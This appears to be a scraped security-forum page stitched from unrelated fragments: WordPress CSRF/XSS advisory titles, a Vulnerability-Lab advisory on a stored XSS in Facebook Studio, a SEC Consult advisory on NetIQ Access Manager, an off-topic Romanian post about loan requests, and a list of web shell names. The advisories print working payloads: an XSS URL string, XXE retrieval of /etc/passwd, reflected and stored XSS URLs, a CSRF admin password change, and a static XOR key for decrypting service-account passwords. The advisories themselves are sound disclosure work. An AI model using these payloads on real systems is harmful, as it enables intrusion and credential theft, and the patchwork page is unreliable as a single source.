WordPress iTwitter 0.04 Cross Site Request Forgery / Cross Site Scripting WordPress PictoBrowser 0.3.1 CSRF / XSS WordPress Twitter 0.7 CSRF / XSS WordPress PWG Random 1.11 CSRF / XSS WordPress gSlideShow 0.1 CSRF / XSS WordPress SimpleFlickr 3.0.3 CSRF / XSS WordPress twimp-wp Cross Site Request Forgery / Cross Site Scripting WordPress Simplelife 1.2 CSRF / XSS ? Packet Storm WordPress Twitter LiveBlog 1.1.2 CSRF / XSS WordPress TweetScribe 1.1 CSRF / XSS WordPress WP Limit Posts Automatically 0.7 CSRF / XSS WordPress WP Unique Article Header Image 1.0 CSRF / XSS

Document Title: =============== Facebook Bug Bounty #16 (Studio) - Persistent Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1368 Facebook Security ID: 219162244 Release Date: ============= 2014-12-10 Vulnerability Laboratory ID (VL-ID): ==================================== 1368 Common Vulnerability Scoring System: ==================================== 3.5 Product & Service Introduction: =============================== Facebook is an online social networking service, whose name stems from the colloquial name for the book given to students at the start of the academic year by some university administrations in the United States to help students get to know each other. It was founded in February 2004 by Mark Zuckerberg with his college roommates and fellow Harvard University students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris Hughes. The website`s membership was initially limited by the founders to Harvard students, but was expanded to other colleges in the Boston area, the Ivy League, and Stanford University. It gradually added support for students at various other universities before opening to high school students, and eventually to anyone aged 13 and over. Facebook now allows any users who declare themselves to be at least 13 years old to become registered users of the site. Users must register before using the site, after which they may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics, and categorize their friends into lists such as `People From Work` or `Close Friends`. As of September 2012, Facebook has over one billion active users, of which 8.7% are fake. According to a May 2011 Consumer Reports survey, there are 7.5 million children under 13 with accounts and 5 million under 10, violating the site`s terms of service. In May 2005, Accel partners invested $12.7 million in Facebook, and Jim Breyer added $1 million of his own money to the pot. A January 2009 Compete.com study ranked Facebook as the most used social networking service by worldwide monthly active users. Entertainment Weekly included the site on its end-of-the-decade `best-of` list, saying, `How on earth did we stalk our exes, remember our co-workers` birthdays, bug our friends, and play a rousing game of Scrabulous before Facebook?` Facebook eventually filed for an initial public offering on February 1, 2012, and was headquartered in Menlo Park, California. Facebook Inc. began selling stock to the public and trading on the NASDAQ on May 18, 2012. Based on its 2012 income of USD 5.1 Billion, Facebook joined the Fortune 500 list for the first time, being placed at position of 462 on the list published in 2013. (Copy of the Homepage: http://en.wikipedia.org/wiki/Facebook ) Abstract Advisory Information: ============================== An independent Vulnerability Laboratory Researcher discovered a persistent input validation web vulnerability in the official Facebook Studio web-application. Vulnerability Disclosure Timeline: ================================== 2014-12-10: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Facebook Product: Studio Service - Web Application 2014 Q4 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Facebook Studio online-service web-application. The vulnerability allows remote attackers to inject malicious script codes on the application-side to compromise the online-service application. The vulnerability is located in the dashboard module of the facebook studio service. Remote attackers are able to inject own script codes to the mobile client of facebook. After the inject of the payload the attacker can visit the dashboard service to execute the script codes. The vulnerability was disclosed during a pentest of the htmlentities on fb mobile client to the facebook studio service. The attack vector of the issue is persistent and the request method to inject is POST. The security risk of the persistent vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the persistent security vulnerability requires a low privileged web-application user account and medium user interaction. Successful exploitation of the vulnerability results in persistent phishing attacks, persistent session hijacking attacks, persistent external redirect to malicious sources and application-side manipulation of affected or connected module context. Request Method(s): [+] POST Vulnerable Module(s): Input [+] https://m.facebook.com/editprofile.php?type=contact&edit=website&refid=17 Affected Module(s): Output [+] https://www.facebook-studio.com/dashboard#_=_ Proof of Concept (PoC): ======================= Exploiting this bug is a first order injection in facebook mobile (m.facebook.com for firefox) that will result xss in the studio. Manual steps to reproduce the vulnerability ... 1. Open the following fb mobile webpage https://m.facebook.com/editprofile.php?type=contact&edit=website&refid=17 Note: (using Firefox) 2. Then remove all the URLs you have (if you have any) 3. Add for example "https://somethinag.com/"onmouseover="alert(31337);*." (without the quotes) 4. After that surf to https://www.facebook-studio.com/dashboard#_=_ and you will have your stored XSS. Note: Facebook didnt use htmlentity to the url when processing to add it in the database. When-ever being rendered, it wont be a second-order-injection. 5. Successful reproduce of the vulnerability! The full payload you need to add to your website is ... PoC: https://url-source.com/"style="font-size:900px;"onmouseover="alert(31337);*. Note: The full payload you need to add to your website is listed above. Solution - Fix & Patch: ======================= Issue has already been patched by the facebook developer team during the participate in the official bug bounty program. Security Risk: ============== The security risk of the persistent input validation web vulnerability in the facebook studio website is estimated as medium. (CVSS 3.5) Credits & Authors: ================== Paulos Yibelo Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source

SEC Consult Vulnerability Lab Security Advisory < 20141218-2 > ======================================================================= title: Multiple high risk vulnerabilities product: NetIQ Access Manager vulnerable version: 4.0 SP1 fixed version: 4.0 SP1 Hot Fix 3 CVE number: CVE-2014-5214, CVE-2014-5215, CVE-2014-5216, CVE-2014-5217 impact: High homepage: https://www.netiq.com/ found: 2014-10-29 by: W. Ettlinger SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: --------------------------- "As demands for secure web access expand and delivery becomes increasingly complex, organizations face some formidable challenges. Access Manager provides a simple yet secure and scalable solution that can handle all your web access needs—both internal as well as in the cloud." URL: https://www.netiq.com/products/access-manager/ Business recommendation: ------------------------ An attacker without an account on the NetIQ Access Manager is be able to gain administrative access by combining different attack vectors. Though this host may not always be accessible from a public network, an attacker is still able to compromise the system when directly targeting administrative users. Because the NetIQ Access Manager is used for authentication, an attacker compromising the system can use it to gain access to other systems. SEC Consult highly recommends that this software is not used until a full security review has been performed and all issues have been resolved. Vulnerability overview/description: ----------------------------------- 1) XML eXternal Entity Injection (XXE, CVE-2014-5214) Authenticated administrative users can download arbitrary files from the Access Manager administration interface as the user "novlwww". The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015993 2) Reflected Cross Site Scripting (XSS, CVE-2014-5216) Multiple reflected cross site scripting vulnerabilities were found. These allow effective attacks of administrative and SSLVPN sessions. The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015994 3) Persistent Site Scripting (XSS, CVE-2014-5216) A persistent cross site scripting vulnerability was found. This allows effective attacks of administrative and SSLVPN sessions. The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015996 4) Cross Site Request Forgery (CVE-2014-5217) The Access Manager administration interface does not have CSRF protection. The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015997 5) Information Disclosure (CVE-2014-5215) Authenticated users of the administration interface can gain authentication information of internal administrative users. The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015995 By combining all of the above vulnerabilities (CSRF, XSS, XXE) an unauthenticated, non-admin user may gain full access to the system! Proof of concept: ----------------- 1) XML eXternal Entity Injection (XXE) As an example, the following URL demonstrates the retrieval of the /etc/passwd file as an authenticated administrative user: https://<host>:8443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=<!DOCTYPE+request+[%0a<!ENTITY+include+SYSTEM+"/etc/passwd">%0a]><query><container>%26include%3b</container><subclasses>false</subclasses></query> 2) Reflected Cross Site Scripting (XSS) The following URLs demonstrate different reflected XSS flaws in the administration interface and the user interface. https://<host>:8443/nps/servlet/webacc?taskId=dev.Empty&merge=dm.GenericTask&location=/roma/jsp/admin/view/main.jss'%2balert+('xss')%2b' https://<host>:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E https://<host>:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E https://<host>/nidp/jsp/x509err.jsp?error=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E https://<host>/sslvpn/applet_agent.jsp?lang=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E 3) Persistent Site Scripting (XSS) The following URL injects a stored script on the auditing page: https://<host>:8443/roma/system/cntl?handler=dispatcher&command=auditsave&&secureLoggingServersA='){}};alert('xss');function+){if('&port=1289 4) Cross Site Request Forgery As an example, an attacker is able to change the administration password to '12345' by issuing a GET request in the context of an authenticated administrator. The old password is not necessary for this attack! https://<host>:8443/nps/servlet/webacc?taskId=fw.SetPassword&nextState=doSetPassword&merge=dev.GenConf&selectedObject=P%3Aadmin.novellP&single=admin.novell&SetPswdNewPassword=12345&SetPswdVerifyPassword=12345 5) Information Disclosure The following URLs disclose several useful information to an authenticated account: https://<host>:8443/roma/jsp/volsc/monitoring/dev_services.jsp https://<host>:8443/roma/jsp/debug/debug.jsp The disclosed system properties: com.volera.vcdn.monitor.password com.volera.vcdn.alert.password com.volera.vcdn.sync.password com.volera.vcdn.scheduler.password com.volera.vcdn.publisher.password com.volera.vcdn.application.sc.scheduler.password com.volera.vcdn.health.password The static string "k~jd)*L2;93=Gjs" is XORed with these values in order to decrypt passwords of internally used service accounts. By combining all of the above vulnerabilities (CSRF, XSS, XXE) an unauthenticated, non-admin user may gain full access to the system! Vulnerable / tested versions: ----------------------------- The vulnerabilities have been verified to exist in the NetIQ Access Manager version 4.0 SP1, which was the most recent version at the time of discovery. Vendor contact timeline: ------------------------ 2014-10-29: Contacting security@netiq.com, sending responsible disclosure policy and PGP keys 2014-10-29: Vendor redirects to security@novell.com, providing PGP keys through Novell support page 2014-10-30: Sending encrypted security advisory to Novell 2014-10-30: Novell acknowledges the receipt of the advisory 2014-12-16: Novell: the vulnerability fixes will be released tomorrow; The CSRF vulnerability will not be fixed immediately ("Since this can be done only after an authorized login"); two XSS vulnerabilities can not be exploited ("We could not take advantage or retrieve any cookie info on the server side - it looks like it's a client side cross scripting attack.") 2014-12-16: Explaining why those vulnerabilities can be exploited 2014-12-17: Novell: Fix will be released tomorrow 2014-12-17: Verifying release of advisory tomorrow 2014-12-18: Novell: Advisory can be released 2014-12-18: Coordinated release of security advisory Solution: --------- Update to the latest available of Access Manager and implement workarounds mentioned in the KB articles by Novell linked above. Workaround: ----------- For some vulnerabilities, Novell provides best practice recommendations in the URLs linked above. Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested to work with the experts of SEC Consult? Write to career@sec-consult.com EOF W. Ettlinger / @2014 Source

ba da mai veniti multi cu cerseala? Off:// Aveti idee cum pot face rost de 1 milion de dolari? mai am nevoie doar de 1 milion si o sa fiu milionar! https://rstforums.com/forum/94024-ajutor-imprumut.rst https://rstforums.com/forum/60486-imprumut.rst https://rstforums.com/forum/75076-3-centi-paypal.rst https://rstforums.com/forum/62373-imprumut-3-euro.rst https://rstforums.com/forum/85639-imprumut-paypal.rst https://rstforums.com/forum/71639-5-e-paypal.rst https://rstforums.com/forum/86029-imprumut-3-paypal-pana-maine.rst https://rstforums.com/forum/88712-care-s-mi-dea-n-mprumut-1-a.rst https://rstforums.com/forum/88965-cerere.rst https://rstforums.com/forum/88936-cerere-paypal.rst https://rstforums.com/forum/91739-imprumut-cu-1-0-73-e-paypal.rst https://rstforums.com/forum/92423-imprumut-2-paypal.rst https://rstforums.com/forum/93231-salut-rst.rst https://rstforums.com/forum/93989-am-nevoie-de-ajutor.rst

CCCPShell Acid Shell v2 b374k 2.2 Shell